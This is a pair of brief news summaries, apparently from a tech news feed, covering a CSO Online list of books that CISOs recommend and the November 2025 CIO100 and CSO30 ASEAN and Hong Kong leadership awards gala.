📚 This CSO Online roundup gathers books recommended by practicing CISOs to refine judgment, influence leadership style, and navigate modern security complexity. Recommendations range from risk and AI-focused studies to cognitive science, social engineering narratives, and organizational behavior, showing how reading informs both tactical and strategic decisions. The list highlights practical guides for risk measurement, frameworks for improving focus and decision making, and titles that remind leaders to protect attention and sustain personal resilience.

CIO100 & CSO30 ASEAN Awards Celebrate Tech Leadership

🏆 The CIO100 and CSO30 ASEAN and Hong Kong Awards Gala on November 12, 2025 validated the region's maturing technology leadership, drawing winners and teams from Singapore, Malaysia, Indonesia, Vietnam, Cambodia, Thailand, Hong Kong and the Philippines. With a record 243 nominations, the program highlighted artificial intelligence as the defining strategic imperative reshaping operations, innovation and security. Judges prioritized clear, measurable business impact, recognizing cybersecurity leaders and collaborative public–private initiatives. Headline sponsor was AWS.